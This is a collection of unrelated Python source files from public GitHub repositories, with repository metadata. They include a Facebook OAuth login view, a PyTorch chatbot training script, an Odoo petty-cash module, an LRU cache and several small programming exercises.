access_token_data[\"access_token\"]\n\ndef validate_access_token(user_access_token):\n\tpage_url = \"https://graph.facebook.com/debug_token\"\n\tquery_data = {\n\t\t\"input_token\": user_access_token,\n\t\t\"access_token\": settings.FACEBOOK_APP_ID + \"|\" + settings.FACEBOOK_APP_SECRET\n\t}\n\t# The response will be a json object that we need to decode\n\tdebug_token_response = urllib2.urlopen(page_url + \"?\" + urllib.urlencode(query_data))\n\tdebug_token_json = debug_token_response.read()\n\tdebug_token_dict = json.loads(debug_token_json)\n\t#print(\"got debug token data\")\n\t#print(debug_token_dict)\n\t\n\tdebug_token_data = debug_token_dict[\"data\"]\n\tapp_id = settings.FACEBOOK_APP_ID\n\t\n\treturn debug_token_data[\"app_id\"] == app_id\n\ndef get_user_data(user_access_token):\n\tpage_url = \"https://graph.facebook.com/me\"\n\tquery_data = {\n\t\t\"access_token\": user_access_token,\n\t}\n\tme_response = urllib.urlopen(page_url + \"?\" + urllib.urlencode(query_data))\n\tme_json = me_response.read()\n\tme_data = json.loads(me_json)\n\treturn me_data\n\ndef facebook_login(request):\n\tfacebook_page = \"\"\n\tif \"code\" in request.GET:\n\t\ttry:\n\t\t\t# First we need to get a user access token from the code we got\n\t\t\tuser_access_token = get_user_access_token(request)\n\t\t\t#print(user_access_token)\n\t\t\t\n\t\t\t# Verify that the token is valid\n\t\t\tif validate_access_token(user_access_token):\n\t\t\t\n\t\t\t\t# Get data about the user that we need to login to the site or to create a new user\n\t\t\t\tuser_data = get_user_data(user_access_token)\n\t\t\t\n\t\t\t\tuser = authenticate(user_data=user_data, access_token=user_access_token)\n\t\t\t\tif user is not 
None:\n\t\t\t\t\tif user.is_active:\n\t\t\t\t\t\tlogin(request, user)\n\t\t\t\t\t\treturn HttpResponseRedirect(\"/\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tfacebook_page = \"User is not active\"\n\t\t\t\telse:\n\t\t\t\t\tfacebook_page = \"Invalid login\"\n\t\t\telse:\n\t\t\t\tfacebook_page = \"Invalid access token\"\n\t\t\n\t\t#print(json.dumps(debug_token_response, sort_keys = False, indent = 4))\n\t\texcept HTTPError as e:\n\t\t\tjson_error = json.loads(e.read())\n\t\t\treturn HttpResponse(json.dumps(json_error, sort_keys = False, indent = 4))\n\telse:\n\t\tquery_data = {\n\t\t\t\"client_id\": settings.FACEBOOK_APP_ID,\n\t\t\t\"redirect_uri\": \"http://\" + request.get_host() + request.path,\n\t\t\t\"scope\": \"email\"\n\t\t}\n\t\tlogin_url = \"https://www.facebook.com/dialog/oauth?\" + urllib.urlencode(query_data)\n\t\treturn HttpResponseRedirect(login_url)\n\t\n\treturn HttpResponse(facebook_page)","repo_name":"gidmonbrewing/hops_se","sub_path":"noctoz_oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10547680837","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 22 18:54:02 2017\n\n@author: Thomas\n\"\"\"\n\nfrom __future__ import division\nimport xlrd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\ndef load_traces(filename, sheetname):\n book = xlrd.open_workbook(filename)\n sheet = book.sheet_by_name(sheetname)\n \n res = {}\n for row in range(1, sheet.nrows):\n key = sheet.cell_value(row, 0)\n res[key] = {\"number_cores\": sheet.cell_value(row,1),\n \"time_begin\": math.ceil(sheet.cell_value(row,2)/60),\n \"time_end\": math.ceil(sheet.cell_value(row,3)/60),\n \"time\": math.ceil(sheet.cell_value(row,4)/60)}\n \n return res\n\ndef plot_sum_cores(values, filename=\"\"):\n max_time = int(max([values[key][\"time_end\"] for key in values.keys()]))\n\n utilization = np.zeros(max_time)\n \n for key in values.keys():\n t_begin = values[key][\"time_begin\"]\n t_end = values[key][\"time_end\"]\n utilization[t_begin:t_end] += values[key][\"number_cores\"]\n \n plt.figure()\n plt.plot(np.array(range(max_time))/60, utilization)\n plt.xlabel(\"Time in h\")\n plt.savefig(\"plot_traces/\"+filename, bbox_inches=\"tight\", dpi=400)\n\nfor i in range(1,7):\n plot_sum_cores(load_traces(\"traces.xlsx\", \"DS\"+str(i)), \"DS\"+str(i)+\".png\") \n\n","repo_name":"ThomasSchuetz/workspace","sub_path":"JobShopScheduling/visualize_traces.py","file_name":"visualize_traces.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"32622662725","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n\nimport torch\nimport torch.nn as nn \nfrom torch import optim\nimport os\n\nfrom formatData import corpus, corpus_name, datafile\nfrom cleanData import loadPrepareData, trimRareWords\nfrom evaluation import GreedySearchDecoder, BeamSearchDecoder\nfrom encoder import EncoderRNN\nfrom decoder import LuongAttnDecoderRNN\nfrom trainingProcedure import trainIters\nfrom vocabulary import Voc\nfrom evaluationProcedure import evaluateInput\nUSE_CUDA = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if USE_CUDA else \"cpu\")\n\n\n#############################################################################\n# PART 1 : LOAD & PREPROCESS DATA \n# Using the Cornell Movie-Dialogs Corpus : Conversational exchanges from 617 movies\n# Reformat data into structures of form question-answers\n# Output : formatted_movie_lines.txt\n#############################################################################\n\n#Uncomment to format the data\n#formatData()\n\n\n##############################################################################\n#PART 2 : LOAD AND TRIM DATA \n# Mapping each unique word to a discrete numerical space\n##############################################################################\n\n\n# Preprocessing : convert to ascii, lowercase, trim non-letter, max-length\n# Load/Assemble voc and pairs\nsave_dir = os.path.join(\"data\", \"save\")\nvoc, pairs = loadPrepareData(corpus, corpus_name, datafile, save_dir)\n\n#Print some pairs to validate\n#print(\"\\npairs:\")\n#for pair in pairs[:10]:\n# print(pair)\n\n# Trim voc and pairs\npairs = trimRareWords(voc, pairs)\n\n\n#############################################################################\n# PART 3: PREPARE DATA FOR MODELS\n# Models expect numerical torch tensors as inputs\n# USing mini-batch we need to have same length for sentences so we pad\n#############################################################################\n\n# Example for validation\n#small_batch_size = 5\n#batches = batch2TrainData(voc, [random.choice(pairs) for _ in range(small_batch_size)])\n#input_variable, lengths, target_variable, mask, max_target_len = batches\n\n#print(\"input_variable:\", input_variable)\n#print(\"lengths:\", lengths)\n#print(\"target_variable:\", target_variable)\n#print(\"mask:\", mask)\n#print(\"max_target_len:\", max_target_len)\n\n##############################################################################\n# PART 4 : DEFINE SEQ2SEQ MODEL\n# Using two RNN one for encoder (historical data) and one for decoder (Predictions)\n##############################################################################\n\n###################\n# PART 4.1: ENCODER\n# See encooder.py\n\n####################\n# PART 4.2 : DECODER\n# See decoder.py \n \n##############################################################################\n# PART 5 : DEFINE TRAINING PROCEDURE\n##############################################################################\n\n# See trainingProcedure.py\n \n##############################################################################\n# PART 6 : DEFINING EVALUATION\n# Talkin to the bot\n# Defining how the model decode the encoded input\n##############################################################################\n\n# See evaluationProcedure.py\n\n##############################################################################\n# PART 7 : RUN 
THE MODEL\n# Choose to start from scratch or set a checkpoint to load from\n#############################################################################\n\n# Configure models\nmodel_name = 'cb_model4layerlowlr'\nattn_model = 'dot'\n#attn_model = 'general'\n#attn_model = 'concat'\n\nhidden_size = 512\n#hidden_size = 700 \n\nencoder_n_layers = 4 \ndecoder_n_layers = 4\n#encoder_n_layers = 3\n#decoder_n_layers = 3\n\n#dropout = 0.1\ndropout = 0.1\n\nbatch_size = 32\n\n\n# Set checkpoint to load from; set to None if starting from scratch\nloadFilename = None\ncheckpoint_iter = 8000\ncheckpoint = ''\n#loadFilename = os.path.join(save_dir, model_name, corpus_name, '{}-{}_{}'.format(\n # encoder_n_layers, decoder_n_layers, hidden_size),\n # '{}_chceckpoint.tar'.format(checkpoint_iter))\nloadFilename = os.path.join(r\"C:\\Users\\uros\\Desktop\\chatbot-udes\\data\\save\\cb_model4layerlowlr\\openSubtitles+cornell\\4-4_512\\400000_checkpoint.tar\")\n# Load model if a loadFilename is provided\nif loadFilename:\n # If loading on same machine the model was trained on\n checkpoint = torch.load(loadFilename)\n \n \n #If loading a model trained on GPU to CPU\n #checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))\n \n encoder_sd = checkpoint['en']\n decoder_sd = checkpoint['de']\n encoder_optimizer_sd = checkpoint['en_opt']\n decoder_optimizer_sd = checkpoint['de_opt']\n embedding_sd = checkpoint['embedding']\n voc = Voc(corpus_name)\n voc.__dict__ = checkpoint['voc_dict']\n\nprint('Building encoder and decoder ...')\n\n \n\n# Initialize word embeddings\nembedding = nn.Embedding(voc.num_words, hidden_size)\nif loadFilename:\n \n embedding.load_state_dict(embedding_sd)\n \n# Initialize encoder & decoder models\nencoder = EncoderRNN(hidden_size, embedding, encoder_n_layers, dropout)\ndecoder = LuongAttnDecoderRNN(attn_model, embedding, hidden_size, voc.num_words, \n decoder_n_layers, dropout)\n\nif loadFilename:\n encoder.load_state_dict(encoder_sd)\n decoder.load_state_dict(decoder_sd)\n\n# Use appropriate device\nencoder = encoder.to(device)\ndecoder = decoder.to(device)\nprint('Models built and ready to go!')\n\n##############################################################################\n# STEP 8 : RUN THE TRAINING\n##############################################################################\n\n# Configure training/optimization\nclip = 50.0\n\nteacher_forcing_ratio = 1.0\n#teacher_forcing_ratio = 0.5\n\n#learning_rae = 0.0001\n#learning_rate = 0.00015 model errthiun\n#learning_rate = 0.000001 errr2\nlearning_rate = 0.0001\ndecoder_learning_ratio = 5.0\nn_iteration = 400000\nprint_every = 1000\nsave_every = 10000\n# Ensure dropout\nencoder.train()\ndecoder.train()\n\n# Initialize optimizers\nprint('Building optimizers ...')\n\nencoder_optimizer = optim.Adam(encoder.parameters(), lr=learning_rate)\ndecoder_optimizer = optim.Adam(decoder.parameters(), lr=learning_rate * decoder_learning_ratio)\nif loadFilename:\n encoder_optimizer.load_state_dict(encoder_optimizer_sd)\n decoder_optimizer.load_state_dict(decoder_optimizer_sd)\n\n# If you have cuda, configure cuda to call\nfor state in encoder_optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.cuda()\n \n\nfor state in decoder_optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.cuda()\n\n# Run training iterations\nprint(\"Starting Training!\")\ntrainIters(model_name, voc, pairs, encoder, decoder, encoder_optimizer, 
decoder_optimizer,\n embedding, encoder_n_layers, decoder_n_layers, save_dir, n_iteration, batch_size,\n print_every, save_every, clip, corpus_name, loadFilename, \n teacher_forcing_ratio, checkpoint, hidden_size)\n\n##############################################################################\n# FINAL STEP : TALKING WITH THE BOT\n##############################################################################\n\n# Set dropout layers to eval mode\nencoder.eval()\ndecoder.eval()\n\n# Initialize search module\nsearcher = GreedySearchDecoder(encoder, decoder)\n#searcher = BeamSearchDecoder(encoder, decoder, beamWidth = 10)\n# Begin chatting \nevaluateInput(encoder,decoder,searcher,voc)\n\n","repo_name":"urospet/chatbot","sub_path":"pythorch-chatbot.py","file_name":"pythorch-chatbot.py","file_ext":"py","file_size_in_byte":7714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"71259701422","text":"# 연습문제 베이비진 게임 (제출용) D2\r\n# 완전탐색 리스트! 해서\r\n# 베이비진 검사하기\r\n# https://m.blog.naver.com/ojeongeuni/221325229337\r\n\r\ndef bbg(i,k): #i: 값을 결정할 자리, k: 결정할 개수\r\n global ans\r\n if i==k: #babygin 판별\r\n now = lst\r\n if (now[0]+1==now[1] and now[1]+1==now[2]) or (now[0]==now[1]==now[2]):\r\n if (now[3]==now[4]==now[5]) or (now[3]+1==now[4] and now[4]+1==now[5]):\r\n ans = 1\r\n return\r\n\r\n else: #리스트 만들기\r\n for j in range(i,k): #자신부터 오른쪽 원소들과 교환\r\n lst[i], lst[j] = lst[j], lst[i]\r\n bbg(i+1,k)\r\n lst[i],lst[j] = lst[j],lst[i] #원래대로\r\n\r\n\r\nT = int(input())\r\nfor tc in range(1,T+1):\r\n lst = list(map(int, input()))\r\n ans = 0\r\n bbg(0,len(lst))\r\n\r\n print(f'#{tc} {ans}')","repo_name":"dontk1llme/TIL","sub_path":"Python/algorithm/230327/베이비진.py","file_name":"베이비진.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"71150281904","text":"#!/usr/bin/python3\n\nclass Device:\n \"\"\"Wraps a Domoticz device and provides methods to read values and change state.\"\"\"\n\n def __init__(self, domoticz, state):\n self.id = int(state['idx'])\n self.name = state['Name']\n self.capabilities = []\n\n self._domoticz = domoticz\n self._detect_capabilities()\n\n #Internals\n def _assert_capability(self, c):\n if not (c in self.capabilities):\n raise TypeError(\"Can't do that! I have the following capabilities: \" + ', '.join(self.capabilities))\n\n def _get_state(self, value=None):\n state = self._domoticz.get_device_state(self.id)\n return state.get(value) if (state and value) else state\n\n def _detect_capabilities(self):\n switchType = self._get_state(\"SwitchType\")\n if switchType:\n self.capabilities += [\"switch\"]\n if switchType == \"Dimmer\":\n self.capabilities += [\"dim\"]\n\n if self._get_state(\"Temp\"):\n self.capabilities += [\"thermometer\"]\n\n if self._get_state(\"Humidity\"):\n self.capabilities += [\"hygrometer\"]\n\n def _request(self, qd):\n return self._domoticz._agent.request(qd)\n\n #Output\n def __str__(self):\n return str(self.id) if not self.name else \"{0.name} ({0.id})\".format(self)\n\n def readout(self):\n out = [str(self)]\n if \"switch\" in self.capabilities:\n out += [\"Switch status: \" + (\"ON\" if self.is_on else \"OFF\")]\n if \"dim\" in self.capabilities:\n out += [\"Dimmer level: {0:.0%}\".format( self.dim_level )]\n if \"thermometer\" in self.capabilities:\n out += [\"Temperature: {0}\".format( self.temperature )]\n if \"hygrometer\" in self.capabilities:\n out += [\"Humidity: {0:.0%}\".format( self.humidity )]\n\n return '\\n'.join(out);\n\n #Switch functionality\n @property\n def is_on(self):\n self._assert_capability(\"switch\")\n return self._get_state(\"Status\") != \"Off\"\n\n @property\n def dim_level(self):\n return (self._get_state(\"Level\") / 100.0) if self.is_on else 0;\n\n def switch(self, state):\n self._assert_capability(\"switch\")\n\n switchcmd = None\n if isinstance(state, str):\n switchcmd = state.capitalize()\n if switchcmd not in [\"On\", \"Off\"]:\n raise ValueError(\"switch(state) must be a boolean value or the string 'On' or 'Off'.\")\n else:\n switchcmd = \"On\" if state else \"Off\"\n\n self._domoticz.invalidate_device(self.id)\n\n self._request({\n \"type\": \"command\",\n \"param\": \"switchlight\",\n \"idx\": self.id,\n \"switchcmd\": switchcmd,\n })\n\n def dim(self, level):\n self._assert_capability(\"dim\")\n self._domoticz.invalidate_device(self.id)\n self._request({\n \"type\": \"command\",\n \"param\": \"switchlight\",\n \"idx\": self.id,\n \"switchcmd\": \"Set Level\",\n \"level\": round(level * 16)\n })\n\n #Climate functionality\n @property\n def temperature(self):\n self._assert_capability(\"thermometer\")\n return self._get_state(\"Temp\")\n\n @property\n def humidity(self):\n self._assert_capability(\"hygrometer\")\n return self._get_state(\"Humidity\") / 100.0\n","repo_name":"robhol/DomoticzControl","sub_path":"domoticz_control/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"745648940","text":"# _*_ coding: utf-8 _*_\n\"\"\"\nTime: 2021/12/31 13:10\nAuthor: ChenXin\nVersion: V 0.1\nFile: flashText.py\nDescribe: Github link: https://github.com/Chen-X666\n\"\"\"\nfrom flashtext import KeywordProcessor\n\ndef build_actree(wordlist):\n '''\n AC自动机进行关键词匹配\n 构造AC trie\n '''\n actree = KeywordProcessor()\n for index, word in enumerate(wordlist):\n actree.add_keyword(word) # 向trie树中添加单词\n #self.actree = actree\n return actree\n\ndef ac_detect(actree,text,span_info = True):\n '''\n AC自动机进行关键词匹配\n 文本匹配\n '''\n region_wds = []\n for w1 in actree.extract_keywords(text,span_info = span_info):\n if len(w1) > 0:\n region_wds.append(w1[0])\n return region_wds\n\nif __name__ == '__main__':\n wordlist = ['健康','减肥']\n text = '今天你减肥了吗,今天你健康了吗,减肥 = 健康!'\n actree = build_actree(wordlist)\n print(ac_detect(actree,text))","repo_name":"Chen-X666/bulletNewWordsDiscovery","sub_path":"NewWordDiscovery/tool/flashText.py","file_name":"flashText.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"91"}
+{"seq_id":"5748739501","text":"\"\"\" [DESAFIO] Crie um programa que leia o tamanho de três segmentos de reta.\r\nAnalise seus comprimentos e diga se é possível formar um triângulo com essas\r\nretas. Matematicamente, para três segmentos formarem um triângulo, o comprimento\r\nde cada lado deve ser menor que a soma dos outros dois.\r\n\"\"\"\r\nline1 = float(input('Set a line segment: '))\r\nline2 = float(input('Set other line segment: '))\r\nline3 = float(input('Set another line segment: '))\r\n\r\nif line1 + line2 > line3 and line2+line3 > line1 and line1+line3> line2:\r\n print('You can form a triangle with these segments.')\r\n\r\n\r\n\r\n","repo_name":"felipeonf/Exercises_Python","sub_path":"exercícios_fixação/024.py","file_name":"024.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12989001019","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, orm\nfrom openerp import netsvc\n\n\nclass account_cash_statement(orm.Model):\n _inherit = \"account.bank.statement\"\n\n def journal_id_change(self, cr, uid, context=None, *args):\n context = context or {}\n is_cjc = self.pool.get(\"account.journal\").browse(cr, uid, args[0], context=context).is_cjc\n return {\"value\": {\"is_cjc\": is_cjc}}\n\n _columns = {\n \"is_cjc\": fields.boolean(\"Control de caja chica\", readonly=False)\n }\n\n def create_invoice_wizard(self, cr, uid, ids, context=None):\n view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'marcos_cjc', 'cjc_wizard_view_form')[1]\n wizard = {\n 'name': 'Gasto de caja chica',\n 'view_mode': 'form',\n 'view_id': False,\n 'views': [(view_id, 'form')],\n 'view_type': 'form',\n 'res_model': 'cjc.invoice.wizard',\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n 'context': context\n }\n return wizard\n\n def button_confirm_cash(self, cr, uid, ids, context=None):\n result = super(account_cash_statement, self).button_confirm_bank(cr, uid, ids, context=context)\n try:\n wf_service = netsvc.LocalService(\"workflow\")\n invoiced = []\n uninvoiced = []\n for statement in self.browse(cr, uid, ids):\n for line in statement.line_ids:\n if line.invoice_id:\n invoiced.append(line.invoice_id.id)\n elif line.amount < 0:\n uninvoiced.append(line)\n\n # for inv_id in invoiced:\n # wf_service.trg_validate(uid, 'account.invoice', inv_id, 'invoice_open', cr)\n\n statement = self.browse(cr, uid, ids)[0]\n journal = statement.journal_id\n minor_journal = journal.gastos_journal_id\n minor_partner = minor_journal.special_partner\n minor_product = minor_journal.special_product\n vals = {}\n vals.update({\n u'account_id': journal.default_credit_account_id.id,\n u'check_total': 0,\n u'child_ids': [[6, False, []]],\n u'comment': \"Gasto menor generado por caja chica\",\n u'company_id': 1,\n u'currency_id': journal.company_id.currency_id.id,\n u'date_due': False,\n u'date_invoice': statement.date,\n u'fiscal_position': minor_partner.property_account_position.id,\n u'internal_number': False,\n u'journal_id': minor_journal.id,\n u'message_follower_ids': False,\n u'message_ids': False,\n u'name': False,\n u'ncf_required': False,\n u'origin': statement.name,\n u'parent_id': False,\n u'partner_bank_id': False,\n u'partner_id': minor_partner.id,\n u'payment_term': False,\n u'period_id': statement.period_id.id,\n u'reference': False,\n u'reference_type': \"02\",\n u'supplier_invoice_number': False,\n u'tax_line': [],\n u'user_id': uid,\n u'pay_to': statement.journal_id.pay_to.id,\n u'invoice_line': []\n })\n if uninvoiced:\n line_ids = []\n for line in uninvoiced:\n line_ids.append(line.id)\n line_list = [0, False]\n line_dict = {}\n line_dict.update({\n u'account_analytic_id': False,\n u'account_id': minor_product.property_account_expense.id,\n u'asset_category_id': False,\n u'discount': 0,\n u'invoice_line_tax_id': [[6, False, [t.id for t in minor_product.supplier_taxes_id]]],\n u'name': line.name,\n u'price_unit': abs(line.amount),\n u'product_id': minor_product.id,\n u'quantity': 1,\n u'uos_id': 1\n })\n line_list.append(line_dict)\n vals[\"invoice_line\"].append(line_list)\n\n context.update({u'default_type': u'in_invoice', u'journal_type': u'purchase'})\n inv_id = self.pool.get(\"account.invoice\").create(cr, uid, vals, context=context)\n self.pool.get(\"account.bank.statement.line\").write(cr, uid, line_ids, {\"invoice_id\": inv_id})\n 
wf_service.trg_validate(uid, 'account.invoice', inv_id, 'invoice_open', cr)\n except:\n pass\n\n return result\n\n\n\n\n\nclass account_bank_statement_line(orm.Model):\n _inherit = \"account.bank.statement.line\"\n\n _columns = {\n \"invoice_id\": fields.many2one(\"account.invoice\", \"Factura\")\n }\n\n def unlink(self, cr, uid, ids, context=None):\n context = context or {}\n for line in self.browse(cr, uid, ids):\n if context.get(\"journal_type\", False) == \"cash\" and line.invoice_id:\n self.pool.get(\"account.invoice\").unlink(cr, uid, [line.invoice_id.id], context=context)\n\n return super(account_bank_statement_line, self).unlink(cr, uid, ids, context=context)\n","repo_name":"eneldoserrata/marcos_openerp","sub_path":"marcos_addons/marcos_cjc/account_bank_statement.py","file_name":"account_bank_statement.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70423451184","text":"import GameEnvironment.EnvironmentConfigurer\nimport GameEnvironment.EnvironmentCore\nimport GameEnvironment.EnvironmentRenderer\nimport os\nfrom datetime import datetime\n\nimport tensorflow as tf\nimport numpy as np\n\n\nclass EnvironmentLauncher:\n def __init__(self):\n self.log_path = \"./logs/\"\n if not os.path.exists(self.log_path):\n os.mkdir(self.log_path)\n self.log_file = open(self.log_path + str(datetime.now()).replace(\" \", \"_\").replace(\":\", \"-\") + \".log\", \"w+\")\n\n self.env_renderer = GameEnvironment.EnvironmentRenderer.EnvironmentRenderer(self.log_file)\n self.env_core = GameEnvironment.EnvironmentCore.EnvironmentCore(self.env_renderer, self.log_file)\n self.env_configurer = GameEnvironment.EnvironmentConfigurer.EnvironmentConfigurer(self.env_core,\n self.env_renderer,\n self.log_file)\n\n # Order is important, some things should be initialized earlier although dependencies usually appear earlier.\n # Therefore init() function should to initialize/define object but not his depended objects\n self.env_configurer.init()\n self.env_renderer.init()\n self.env_core.reset(False)\n\n def start(self):\n self.env_configurer.start_threads()\n self.log_file.flush()\n self.log_file.close()\n\n\nif __name__ == '__main__':\n tf.compat.v1.disable_eager_execution()\n np.set_printoptions(precision=3)\n np.set_printoptions(suppress=True)\n\n launcher = EnvironmentLauncher()\n launcher.start()\n","repo_name":"Deesthortered/DiplomaThesis","sub_path":"GameEnvironment/EnvironmentLauncher.py","file_name":"EnvironmentLauncher.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"8052264510","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\nimport sys\nimport os\n\nroot_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..'))\nsys.path.append(root_path)\n\nimport itmm_schedule_checker\n\nclass Test_itmm_schedule_checker(unittest.TestCase):\n def test_WnenDifferentColorsInDateString(self):\n self.parser = itmm_schedule_checker.SchedulePageParser()\n html = ('
Постоянное расписание магистров '\n ''\n 'здесь'\n '(новое!'\n ' версия от 19'\n '.'\n '10.2016 г. 17:20)
')\n\n\n result = self.parser._prepareHTML(html)\n\n self.assertEqual(result,\n ('
Постоянное расписание магистров '\n ''\n 'здесь (новое! версия от 19.10.2016 г. '\n '17:20)
'))\n\n def test_WhenGetContent(self):\n self.parser = itmm_schedule_checker.SchedulePageParser(\n itmm_schedule_checker.content_div_style)\n with open('schedule_webpage.html', encoding='utf-8') as file:\n html = file.read()\n with open('plain_content.txt', encoding='utf-8') as file:\n content = file.read()\n\n self.parser.feed(html)\n\n self.assertEqual(self.parser.content, content)\n\n def test_keywords_highlight(self):\n keywords = (\"381606\",)\n original_html = ('
Не состоятся занятия у групп: '\n '1) группа 1381407-3(а0837-2): 17 ноября занятия по РЯиДР и ИТвИД, '\n '2) 381603м4: 16 ноября занятия по ПиЭВвИТ, '\n '3) 381606м2!: 17 ноября занятия по ИТвПНП
')\n\n html = itmm_schedule_checker.keywords_highlight(original_html, keywords)\n\n self.assertEqual(html,('
Не состоятся занятия у групп: '\n '1) группа 1381407-3(а0837-2): 17 ноября занятия по РЯиДР и ИТвИД, '\n '2) 381603м4: 16 ноября занятия по ПиЭВвИТ, '\n '3) '\n '381606м2!: 17 ноября занятия по ИТвПНП
'))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"rybval/itmm_schedule_checker","sub_path":"tests/unittests.py","file_name":"unittests.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"30605916006","text":"from flask import Flask, request, render_template\nimport base64\nimport os\nfrom db import db_inserts\nfrom search import Search\n\napp = Flask(__name__)\nSearch.start_up()\n\n@app.route(\"/\", methods=(\"GET\", \"POST\"))\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/watchlist/\", methods=(\"GET\", \"POST\"))\ndef watchlist():\n if request.method == \"POST\":\n email = request.form[\"email\"]\n champs = request.form[\"content\"]\n x = db_inserts(email, champs)\n return render_template(\"confirmation.html\")\n if request.method == \"GET\":\n return render_template(\"watchlist.html\")\n\n\n@app.get(\"/confirmed/\")\ndef confirm():\n return render_template(\"confirmation.html\")\n\n\n@app.get(\"/summoner//\")\ndef get_summoner_data(region, nick):\n if request.method == \"GET\":\n return render_template(\"summoner.html\",summoner=Search(region,nick))\n\n\n@app.get(\"/404/\")\ndef test404():\n return render_template(\"404.html\")\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=os.getenv(\"PORT\", default=5000))\n","repo_name":"league-project/league-deployment-project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4339663706","text":"class Node:\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.pre = None\n self.next = None\n\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.head = Node()\n self.tail = Node()\n self.head.next = self.tail\n self.tail.pre = self.head\n\n self.dic = dict()\n \n def get(self, key: int) -> int:\n if key in self.dic:\n self.move_to_end(key)\n return self.dic[key].value\n else:\n return -1\n \n\n def put(self, key: int, value: int) -> None:\n if key in self.dic:\n self.move_to_end(key)\n self.dic[key].value = value\n else:\n new_node = Node(key, value)\n self.dic[key] = new_node\n new_node.pre = self.tail.pre\n new_node.next = self.tail\n self.tail.pre.next = new_node\n self.tail.pre = new_node\n if len(self.dic) > self.capacity:\n self.dic.pop(self.head.next.key)\n self.head.next = self.head.next.next\n self.head.next.pre = self.head\n \n\n def move_to_end(self, key: int):\n #\n old_node = self.dic[key]\n old_node.pre.next = old_node.next\n old_node.next.pre = old_node.pre\n\n old_node.next = self.tail\n old_node.pre = self.tail.pre\n self.tail.pre.next = old_node\n self.tail.pre = old_node\n\n# from collections import OrderedDict\n# class LRUCache(OrderedDict):\n\n# def __init__(self, capacity: int):\n# self.capacity = capacity\n\n\n# def get(self, key: int) -> int:\n# if key not in self:\n# return -1\n# else:\n# self.move_to_end(key)\n# return self[key]\n\n\n# def put(self, key: int, value: int) -> None:\n# if key in self:\n# self.move_to_end(key)\n# self[key] = value\n# if len(self) > self.capacity:\n# self.popitem(last = False)","repo_name":"ShallowAlex/leetcode-py","sub_path":"101-200/146.py","file_name":"146.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7564212430","text":"str = 'dir\\n\\tsubdir1\\n\\t\\tfile1.ext\\n\\t\\tsubsubdir1\\n\\tsubdir2\\n\\t\\tsubsubdir2\\n\\t\\t\\tfile2.ext'\n\n\ndef build_fs(input):\n fs = {}\n files = input.split('\\n')\n # print(files)\n\n current_path = []\n for f in files:\n indentation = 0\n while '\\t' in f[:2]:\n indentation += 1\n f = f[1:]\n\n # print(current_path)\n current_node = fs\n for subdir in current_path[:indentation]:\n current_node = current_node[subdir]\n if '.' in f:\n current_node[f] = True\n else:\n current_node[f] = {}\n current_path = current_path[:indentation]\n current_path.append(f)\n\n return fs\n\n\ndef longest_path(root):\n paths = []\n for key, node in root.items():\n if node == True:\n paths.append(key)\n else:\n paths.append(key + '/' + longest_path(node))\n paths = [path for path in paths if '.' in path]\n if paths:\n return max(paths, key=lambda path: len(path))\n else:\n return ''\n\n\ndef longest_absolute_path(s):\n return len(longest_path(build_fs(s)))\n\n\nprint(longest_absolute_path(str))\n","repo_name":"sj43/Code-Storage","sub_path":"DailyCodingProblem/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
